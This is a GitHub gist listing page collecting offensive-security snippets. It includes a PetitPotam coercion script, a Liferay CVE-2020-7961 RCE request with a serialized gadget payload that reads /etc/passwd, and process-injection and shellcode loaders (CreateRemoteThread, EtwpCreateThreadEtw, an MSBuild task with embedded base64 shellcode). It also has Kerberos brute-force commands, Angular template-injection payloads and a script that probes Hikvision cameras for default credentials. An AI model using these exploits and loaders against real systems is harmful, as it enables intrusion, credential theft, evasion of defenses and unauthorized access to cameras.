Skip to content

Instantly share code, notes, and snippets.

View ashr's full-sized avatar

ashr ashr

View GitHub Profile
@ashr
ashr / PetitPotam.py
Created August 12, 2021 16:08 — forked from micahvandeusen/PetitPotam.py
PetitPotam.py modified to use EfsRpcDecryptFileSrv not EfsRpcOpenFileRaw
View PetitPotam.py
#!/usr/bin/env python
#
# Author: GILLES Lionel aka topotam (@topotam77)
# Modified by: Micah Van Deusen (@micahvandeusen)
# Greetz : grenadine(@Greynardine), skar(@__skar), didakt(@inf0sec1), plissken, pixis(@HackAndDo), shutd0wn(@ _nwodtuhs)
# "Most of" the code stolen from dementor.py from @3xocyte ;)
import sys
import argparse
@ashr
ashr / LiferayRCE(CVE-2020-7961).md
Created February 5, 2021 06:15 — forked from pikpikcu/LiferayRCE(CVE-2020-7961).md
POC Liferay RCE(CVE-2020-7961)
View LiferayRCE(CVE-2020-7961).md
POST /api/jsonws/invoke HTTP/1.1
Host: REDACTED
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
cmd2: cat /etc/passwd
Content-Type: application/x-www-form-urlencoded
Content-Length: 4956
Connection: close

cmd=%7B%22%2Fexpandocolumn%2Fupdate-column%22%3A%7B%7D%7D&p_auth=%3Cvalid+token%3E&formDate=%3Cdate%3E&columnId=123&name=asdasd&type=1&defaultData%3Acom.mchange.v2.c3p0.WrapperConnectionPoolDataSource=%7B%22userOverridesAsString%22%3A%22HexAsciiSerializedMap%3AACED0005737200116A6176612E7574696C2E48617368536574BA44859596B8B7340300007870770C000000023F40000000000001737200346F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6B657976616C75652E546965644D6170456E7472798AADD29B39C11FDB0200024C00036B65797400124C6A6176612F6C616E672F4F626A6563743B4C00036D617074000F4C6A6176612F7574696C2F4D61703B7870740003666F6F7372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F63
@ashr
ashr / Program.cs
Created January 25, 2021 14:33
Generate a CSV containing ParentObject and SPN name from BloodHound export of GetAllSPNS Query
View Program.cs
using System;
using System.IO;
using System.Linq;
using Newtonsoft.Json;
using Newtonsoft.Json.Linq;
namespace spns
{
class Program
{
View CreateRemoteThreadDInvoke.cs
using System;
using System.Diagnostics;
using System.IO;
using System.Runtime.InteropServices;
namespace InjectionTest
{
public class DELEGATES
{
@ashr
ashr / kerberos_attacks_cheatsheet.md
Created May 11, 2020 09:08 — forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks
View kerberos_attacks_cheatsheet.md

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

@ashr
ashr / EtwpTest.cs
Created May 8, 2020 08:40 — forked from TheWover/EtwpTest.cs
Demonstrates using ntdll.dll!EtwpCreateThreadEtw for local shellcode execution.
View EtwpTest.cs
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
namespace EtwpTest
{
class Program
{
static void Main(string[] args)
{
@ashr
ashr / _Instructions_Reproduce.md
Created April 29, 2020 10:54
GhostLoader - AppDomainManager - Injection - 攻壳机动队
View _Instructions_Reproduce.md

GhostLoader Steps :)

1. Create C:\Tools
2. Copy Some .NET, any .NET binary to C:\Tools
3. In this example, we use FileHistory.exe, but any .NET app will do.
4. Ensure FileHistory.exe.config is in the same path
5. Execute C:\Tools\FileHistory.exe
@ashr
ashr / AngularTI.md
Created April 20, 2020 12:42 — forked from mccabe615/AngularTI.md
Angular Template Injection Payloads
View AngularTI.md

1.3.2 and below

{{7*7}}

'a'.constructor.fromCharCode=[].join;
'a'.constructor[0]='\u003ciframe onload=alert(/Backdoored/)\u003e';
@ashr
ashr / hikvision-scrape.sh
Created February 12, 2020 04:17 — forked from smidgedy/hikvision-scrape.sh
This abomination pulls Hikvision NVR/DVR systems out of masscan output JSON, checks them for default creds, and dumps still images from any system it can access to aid identification. Runs faster if you have GNU Parallel. This is what happens when you start a project as a bash one-liner because opening vscode is too much effort.
View hikvision-scrape.sh
#!/bin/bash
# Masscan - common ports are 80, 81, 8000, 8080, 8081, 8090, 8888, 9000, 9001
# I do it like this:
# sudo masscan --banners --source-ip <IP not in use on your network> --rate <how fast you can scan>\
# -iL <list of CIDR to scan> -p <that list of ports above> -oJ <output file.json>
# Output filenames
HIKVISION_LIST_DEFAULT='hikvision-default.txt'
HIKVISION_LIST_NON_DEFAULT='hikvision-nondefault.txt'
@ashr
ashr / AllIdoIsWin.cs
Created January 15, 2020 09:24
Stolen from twitter, think it was posted by Casey Smith (@subTee)
View AllIdoIsWin.cs
/*
<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Target Name="MyTarget">
<SimpleTask MyProperty="My voice is my passport."
MyCode="/EiD5PDowAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdCLgIgAAABIhcB0Z0gB0FCLSBhEi0AgSQHQ41ZI/8lBizSISAHWTTHJSDHArEHByQ1BAcE44HXxTANMJAhFOdF12FhEi0AkSQHQZkGLDEhEi0AcSQHQQYsEiEgB0EFYQVheWVpBWEFZQVpIg+wgQVL/4FhBWVpIixLpV////11IugEAAAAAAAAASI2NAQEAAEG6MYtvh//Vu/C1olZBuqaVvZ3/1UiDxCg8BnwKgPvgdQW7RxNyb2oAWUGJ2v/VY2FsYy5leGUA"
MyProcess="C:\Windows\notepad.exe"/>
</Target>
<UsingTask TaskName="SimpleTask" AssemblyFile="AllIDoIsWinWinWin.dll" />
</Project>
*/